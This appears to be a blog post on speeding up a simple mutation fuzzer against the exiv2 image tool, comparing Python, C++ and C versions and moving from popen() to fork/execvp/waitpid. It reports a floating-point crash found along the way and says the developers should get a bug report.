Looking at the help guidance, let’s just go ahead and randomly take a crack at pr for Print image metadata and also -v for Be verbose during the program run. You can see from this help guidance that there is plenty of attack surface here for us explore but let’s keep things simple for now.

Our command string now in our fuzzers will be something like exiv2 pr -v mutated.jpg.

Let’s go ahead and update our fuzzers and see if we can find some more bugs on a much harder target. It’s worth mentioning that this target is currently supported, and not a trivial binary for us to find bugs on like our last target (an unsupported 7 year old project on Github).

This target has already been fuzzed by much more advanced fuzzers, you can simply google for something like ‘ASan exiv2’ and get plenty of hits of fuzzers creating segfaults in the binary and forwarding the ASan output to the github repository as a bug. This is a significant step up from our last target.

exiv2 on Github

exiv2 Website

Fuzzing Our New Target

Let’s start off with our new and improved Python fuzzer and monitor it’s performance over 50,000 iterations. Let’s add some code that monitors for Floating point exceptions in addition to our Segmentation fault detection (Call it a hunch!). Our new exif() function will look like this:

def exif(counter,data):

    p = Popen(["exiv2", "pr", "-v", "mutated.jpg"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    if p.returncode == -11:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    elif p.returncode == -8:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Floating Point!")

Looking at the output from python3 -m cProfile -s cumtime subpro.py ~/jpegs/Canon_40D.jpg:

75780446 function calls (75780309 primitive calls) in 213.595 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  213.595  213.595 {built-in method builtins.exec}
        1    1.481    1.481  213.595  213.595 subpro.py:3(<module>)
    50000    0.818    0.000  187.205    0.004 subpro.py:111(exif)
    50000    0.543    0.000  143.499    0.003 subprocess.py:920(communicate)
    50000    6.773    0.000  142.873    0.003 subprocess.py:1662(_communicate)
  1641352    3.186    0.000  122.668    0.000 selectors.py:402(select)
  1641352  118.799    0.000  118.799    0.000 {method 'poll' of 'select.poll' objects}
    50000    1.220    0.000   42.888    0.001 subprocess.py:681(__init__)
    50000    4.400    0.000   39.364    0.001 subprocess.py:1412(_execute_child)
  1691919   25.759    0.000   25.759    0.000 {built-in method posix.read}
    50000    3.863    0.000   13.938    0.000 subpro.py:14(bit_flip)
  7950000    3.587    0.000    9.991    0.000 random.py:256(choice)
    50000    7.495    0.000    7.495    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.148    0.000    7.081    0.000 subpro.py:105(create_new)
  7950000    3.884    0.000    5.764    0.000 random.py:224(_randbelow)
   200000    4.582    0.000    4.582    0.000 {built-in method io.open}
    50000    4.192    0.000    4.192    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.339    0.000    3.612    0.000 os.py:617(get_exec_path)
    50000    1.641    0.000    3.309    0.000 subpro.py:8(get_bytes)
   100000    0.077    0.000    1.822    0.000 subprocess.py:1014(wait)
   100000    0.432    0.000    1.746    0.000 subprocess.py:1621(_wait)
   100000    0.256    0.000    1.735    0.000 selectors.py:351(register)
   100000    0.619    0.000    1.422    0.000 selectors.py:234(register)
   350000    0.380    0.000    1.402    0.000 subprocess.py:1471(<genexpr>)
 12066004    1.335    0.000    1.335    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.063    0.000    1.222    0.000 subprocess.py:1608(_try_wait)
    50000    1.160    0.000    1.160    0.000 {built-in method posix.waitpid}
   100000    0.519    0.000    1.143    0.000 os.py:674(__getitem__)
  1691352    0.902    0.000    1.097    0.000 selectors.py:66(__len__)
  7234121    1.023    0.000    1.023    0.000 {method 'append' of 'list' objects}
-----SNIP-----

It appears we took 213 seconds total and didn’t really find any bugs, that’s a shame, but could just be luck. Let’s run our C++ fuzzer in the same exact circumstances and monitor the output.

Here we go, we get a similiar time but much improved:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 50000
Execution Time: 170829ms

That’s a pretty significant improvement, 43 seconds. That’s 20% off of our Python time. (Again, I apologize to math people.)

Let’s keep our C++ fuzzer running for a bit and see if we find any bugs :).

Bugs on Our New Target!

After maybe 10 seconds of running the fuzzer again, I got this terminal output:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 1000000
Floating Point!

It appears we have satisfied requirements for a Floating Point exception. We should have a nice jpg waiting for us in the cppcrashes directory.

root@kali:~/cppcrashes# ls
crash.522.jpg

Let’s confirm the bug by running exiv2 against this sample:

root@kali:~/cppcrashes# exiv2 pr -v crash.522.jpg
File 1/1: crash.522.jpg
Error: Offset of directory Image, entry 0x011b is out of bounds: Offset = 0x080000ae; truncating the entry
Warning: Directory Image, entry 0x8825 has unknown Exif (TIFF) type 68; setting type size 1.
Warning: Directory Image, entry 0x8825 doesn't look like a sub-IFD.
File name       : crash.522.jpg
File size       : 7958 Bytes
MIME type       : image/jpeg
Image size      : 100 x 68
Camera make     : Aanon
Camera model    : Canon EOS 40D
Image timestamp : 2008:05:30 15:56:01
Image number    : 
Exposure time   : 1/160 s
Aperture        : F7.1
Floating point exception

We indeed found a new bug! This is super exciting. We should issue a bug report to the exiv2 developers on Github.

Conclusion

We first optimized our fuzzer in Python and then rewrote it in C++. We gained some massive performance advantages and even found some new bugs on a new harder target.

For some fun, let’s compare our original fuzzer’s performance for 50,000 iterations:

123052109 function calls (123001828 primitive calls) in 6243.939 seconds

As you can see, 6,243 seconds is significantly slower than our C++ fuzzer benchmark of 170 seconds.

Addendum 15/May/2020

Just playing around with porting the C++ fuzzer to C and I made some modest improvements on my own. One of the logic changes I made was to collect the data from the original valid image only once and then copy that data into a newly allocated buffer each fuzzing iteration and then do the mutation operations on the newly allocated buffer. This C version of basically the same C++ fuzzer performed pretty well compared to the C++ fuzzer. Here is a comparison between the two for 200,000 iterations (you can ignore the crash findings as this fuzzer is extremely dumb and 100% random):

h0mbre:~$ time ./cppfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m45.371s
user    7m14.561s
sys     3m10.529s

h0mbre:~$ time ./cfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m7.686s
user    7m27.503s
sys     2m20.843s

So, over 200,000 iterations we end up saving about 35-40 seconds. This was pretty typical in my testing. So just by the few logic changes and using less C++-provided abstractions we saved a lot of sys time. We increased speed by about 5%.

Monitoring Child Process Exit Status

After completing the C translation, I went to Twitter to ask for suggestions about performance improvements. @lcamtuf, the creator of AFL, explained to me that I shouldn’t be using popen() in my code as it spawns a shell and performs abysmally. Here is the code segment I asked for help on:

void exif(int iteration) {
    
    FILE *fileptr;
    
    //fileptr = popen("exif_bin target.jpeg -verbose >/dev/null 2>&1", "r");
    fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");

    int status = WEXITSTATUS(pclose(fileptr));
    switch(status) {
        case 253:
            break;
        case 0:
            break;
        case 1:
            break;
        default:
            crashes++;
            printf("\r[>] Crashes: %d", crashes);
            fflush(stdout);
            char command[50];
            sprintf(command, "cp mutated.jpeg ccrashes/crash.%d.%d",
             iteration,status);
            system(command);
            break;
    }
}

As you can see, we use popen(), run a shell-command, and then close the file pointer to the child process and return the exit-status for monitoring with the WEXITSTATUS macro. I was filtering out some exit codes that I didn’t care about like 253, 0, and 1, and was hoping to see some related to the floating point errors we already found with our C++ fuzzer or maybe even a segfault. @lcamtuf suggested that instead of popen(), I call fork() to spawn a child process, execvp() to have the child process execute a command, and then finally use waitpid() to await the child process termination and return the exit status.

Since we don’t have a proper shell in this syscall path, I had to also open a handle to /dev/null and call dup2() to route both stdout and stderr there as we don’t care about the command output. I also used the WTERMSIG macro to retrieve the signal that terminated the child process in the event that the WIFSIGNALED macro returned true, which would indicate we got a segfault or floating point exception, etc. So now, our updated function looks like this:

void exif(int iteration) {
    
    char* file = "exiv2";
    char* argv[4];
    argv[0] = "pr";
    argv[1] = "-v";
    argv[2] = "mutated.jpeg";
    argv[3] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

You can see that this drastically improves performance for our 200,000 iteration benchmark:

h0mbre:~$ time ./cfuzz2 Canon_40D.jpg 200000
<snipped_results>

real    8m30.371s
user    6m10.219s
sys     2m2.098s

Summary of Results

C++ Fuzzer – 310 iterations/sec
C Fuzzer – 329 iterations/sec (+ 6%)
C Fuzzer 2.0 – 392 iterations/sec (+ 26%)

Thanks to @lcamtuf and @carste1n for the help.

I’ve uploaded the code here: https://github.com/h0mbre/Fuzzing/tree/master/JPEGMutation

Reading view

Background

Introduction

Syscall Infrastructure Update

Calling Convention Changes

Introducing Faults

Sandboxing Thread-Local-Storage

Building Bochs

Implementing a Simple MMU

Handling brk

Handling mmap and munmap

File I/O

Conclusion

Introduction

Syscalls

C Library

Musl

Baby Steps

Execution Context Tracking

Program Start Under Lucid

Lobotomizing Musl Syscalls

Conditionally Calling Into Lucid

Implementing a Context Switch

Extended State

Implementing Syscalls

Returning Gracefully

Conclusion

Next Up?

Introduction && Credit to Gamozolabs

Misc

Bochs

Fuzzer Architecture

Loading an ELF in Memory

ELF Headers

Loading the ELF

Setting Up a Stack for Bochs

Allocating the Stack

Constructing the Stack Data

Executing the Loaded Program

Will Bochs Run?

Next Steps

Resources

Code

Introduction

The Bug

Giant Shoulders

Arbitrary Read

Finding a Read Target

Where are the Write Gadgets?

Exploitation Plan

Finding Init

Forging Objects

Performing Our Writes

Conclusion

Introduction

What I Started With

What I Did

UAF Challenge: Holstein v3

KASLR Bypass

RIP Control

Creating/Locating a ROP Chain and Fake Function Table

Miscellaneous

Further Reading

Exploit Code

Introduction

Target (Easy Mode)

Hello World

Looking for Hooks

__xstat() Hook

Finding a Way to Hook openat()

Refining an fopen64() Hook

Wrapping Up

Conclusion

Introduction

Core Definitions

Code Coverage

Basic Blocks

Edges/Branches/Transitions

Paths

Instrumentation

Handling `brk`

Handling `mmap` and `munmap`

Finding a Way to Hook `openat()`

Refining an `fopen64()` Hook